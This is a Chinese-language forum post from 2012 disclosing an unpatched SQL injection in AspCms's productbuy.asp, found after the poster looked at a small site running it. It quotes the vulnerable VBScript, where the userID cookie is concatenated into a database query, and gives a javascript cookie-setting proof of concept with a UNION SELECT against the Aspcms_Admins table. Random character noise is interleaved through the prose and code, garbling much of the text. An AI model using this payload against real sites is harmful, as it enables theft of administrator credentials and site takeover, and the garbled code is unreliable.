好久没上土司了,上来一看发现在删号名单内.....
: n3 I3 I: j& X: d7 }* o* k- \也没啥好发的,前些天路过某个小站,用的AspCms这个系统,搜索了下,productbuy.asp这个文件存在注射,但是目标已经修补....下载了代码,很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞,但是就在同一个文件下面找到了注射漏洞。。。。。。。
1 @# P9 [* ~- L. |# B6 A; k废话不多说,看代码:0 M4 ?; g9 Y0 d, f2 D1 B: O
& j C. T( M. g/ ?. f4 ?<%
9 I. E0 v% _/ l2 u, R) \4 v. W/ H3 L" z* |4 L8 A% P
if action = "buy" then7 J& Y2 G6 s7 D5 \
+ h2 k! F6 L' C7 _8 Y( k" z+ S
addOrder()
e( c4 O0 f6 u2 C
& K0 i1 [, |' V! @9 selse
& |3 y3 T( y: J2 L( Y: U" M6 _ b' O8 L& {/ b
echoContent()! M' D/ D* I) w8 Z; q
6 t: S$ o4 ?- T+ Q$ W+ [# t
end if
0 ^$ f, e I3 Y/ u3 e' S8 @5 b! u- w' a4 ?/ B1 n A% q; \
# U9 C$ p5 i7 z, S3 z. V
; D! x6 j5 d9 F" |
……略过, D: v+ f! S0 U1 e. K$ f" E
1 p$ d# N5 m; X* F7 e
! W* s& ?, i& s; C
1 y+ }& c; A9 c: I
Sub echoContent()
: n' k! C$ c+ u8 u7 K9 d
& Y: Q, }7 n2 S dim id
; O3 w5 W* z% x2 z- V
% \; P; J2 ?- \1 H1 `2 Z) r id=getForm("id","get")
( o) S! k7 q, t2 u; }
* q* H, @: B4 P6 i. S
) [. C# ~+ y+ J8 v: U J" N4 D
; _ K* f& e+ m7 P6 Z. T& k if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品!","-1" # N# J1 f. T' b( r+ q$ C, A
8 A# D* P; G4 h/ c8 @$ q i% Z0 ]) T 0 n, J# V$ e; ?# Q4 t: f1 E' T4 U
% J% E: r4 O/ {2 X% ~0 A
dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")7 G4 L- O& N9 P! u' m2 d7 M) D
6 ^5 A9 I" j9 d6 b
dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct- }) l1 r! x, C( n( E
' j; y/ m$ V9 I. g$ i4 Q# e B" W) j
Dim templatePath,tempStr6 d8 z; I/ Y5 X" d9 |( Z+ D
3 d- b' M, _+ {$ v3 E templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"
' y1 m T* j$ a! \, N6 o# y8 {/ R7 s# X. m$ B, u2 s2 \4 W% D
2 Y1 u- ], p5 [! E3 [/ Y7 O9 k- ~! p+ b$ B8 k4 W. Z) w. l5 F
set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1")9 D# f5 z4 k+ Z9 a& H' A
! Q( L: }! q4 } selectproduct=rsObj(0)
% p8 t7 R! O W4 S4 E2 {
6 k: k& W0 L$ D$ F0 y & @2 O; Q+ M4 V
z* h7 G; Z. _4 J. T! F2 M Dim linkman,gender,phone,mobile,email,qq,address,postcode/ {- v4 e& b7 u7 P1 |( h3 h& k
0 i5 _, l! ]& W
if isnul(rCookie("loginstatus")) then wCookie"loginstatus",0
3 w% @' @1 L1 l7 _2 u; W
3 ^# ^1 `* P. S7 q( f4 j if rCookie("loginstatus")=1 then
- K+ n) N) ~" N
5 e1 Y' y! z( m( \9 g, j3 v2 y set rsObj=conn.Exec("select * from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")
- }3 _; h+ j5 {& Q7 ^( q! B/ B% v/ @( _
linkman=rsObj("truename")
% ^* `1 c. y! |% {' w+ k* p$ `$ S8 F; h
gender=rsObj("gender")4 a$ G7 b3 _0 q3 z1 P
6 s! e, o7 x2 B% ^
phone=rsObj("phone"): s7 D+ s1 h/ ]' u" t& g
. v. B; ^5 e0 W2 d' j- H
mobile=rsObj("mobile")
2 y3 g5 t, {; Q# }0 v5 |' k6 m, ^
2 f7 d* L2 U# m- I email=rsObj("email")* x8 ]) D1 i6 _
4 @# l! z2 @- G3 n$ ] qq=rsObj("qq")
4 L) R2 G3 {! x8 E" ^7 e- z! J4 f' _1 R& K# P: x
address=rsObj("address"), I4 h9 r: H, y4 @& y/ k$ b* `9 q
( B( ]0 u& X2 [3 | postcode=rsObj("postcode")3 k5 a p, [) T9 G
3 A- o, D+ W" b! j* |6 U
else 6 z: W; N2 j- a$ ]# [4 h2 o4 j' X
4 ?) @7 z) b8 J# i3 `0 A [ gender=1
. v8 C1 j& S/ N# R* Z Z. [- m# G# |5 K9 D. ~* m
end if
; B3 B" d! ]) P' f* l* t) R/ r$ J7 q
rsObj.close()& {& N4 I Q: l6 @9 F
" J6 w4 z: f: e# X9 f" a; S 9 A, T' E. S T/ b
) U0 m9 {! | K7 J$ e5 d
with templateObj
4 M- y) @4 B' w
9 N1 S9 v: {3 e8 I4 z .content=loadFile(templatePath) 0 e3 T# |, Z+ R) d
7 i, r# s! Y& ?4 u" ^
.parseHtml() P" I$ C5 Q: J( C$ P9 l n
6 x( s* K! p3 Z5 Z+ P' @
.content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct)
4 N% t, ?$ o* W) v
$ w$ @. C' y( ? .content=replaceStr(.content,"[aspcms:linkman]",linkman)
h X, v- d# B4 q5 _7 \
, K8 o8 R4 g, P! v7 D .content=replaceStr(.content,"[aspcms:gender]",gender)
@2 J/ Y7 p$ H: J" O. ^% p& [( n
?9 [' `; W X' n3 i, }% b .content=replaceStr(.content,"[aspcms:phone]",phone)
9 ?( B8 B. a& o$ v( d- u9 g- Z3 f- G
.content=replaceStr(.content,"[aspcms:mobile]",mobile) 2 x! B H4 M/ m G8 [6 t
% ^. \; k8 ?! ^6 S D# J3 p .content=replaceStr(.content,"[aspcms:email]",email)
' C# S( L, m* r! L# E3 @) m4 Z! O- |
.content=replaceStr(.content,"[aspcms:qq]",qq)
0 J, O# R, i# |% O/ ^# t5 ^5 ] l1 G: d1 w& O3 {" T! b) _3 K
.content=replaceStr(.content,"[aspcms:address]",address) / K4 Z8 W" h4 [$ T
+ K# \% X6 r( v$ y4 p .content=replaceStr(.content,"[aspcms:postcode]",postcode) & W+ q8 }, E8 f1 ~$ J
: t! y# ~7 v: Q& |$ m6 J- m .parseCommon()
3 m" w# b, _9 |# s) b8 P2 C9 M, N) D9 X9 M& W8 _
echo .content ; G' Q$ V8 q; l: G, j! a& z+ Q
; Q3 N. U2 r2 B3 F$ M: p, [
end with, m2 u* s$ K0 y2 A! L `2 f
* G+ K7 n5 r" h L8 i set templateobj =nothing : terminateAllObjects
1 u: D; @' h8 Y$ \& U1 O( M; \7 }+ s
End Sub
* `: ~" B4 n$ p* Q漏洞很明显,没啥好说的9 h% s% m9 ]. w5 ~
poc:) r, x# [& N0 |% _
) v2 ]1 \ O# Q% B* K9 M4 H
javascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));另外,脚本板块没权限发帖子
. i: b3 ]6 L" a7 m. t" J7 a0 P, j! m7 B9 @$ Y0 H3 ]5 R
|
发表于 2012-12-27 08:35:05
收藏
分享
支持
反对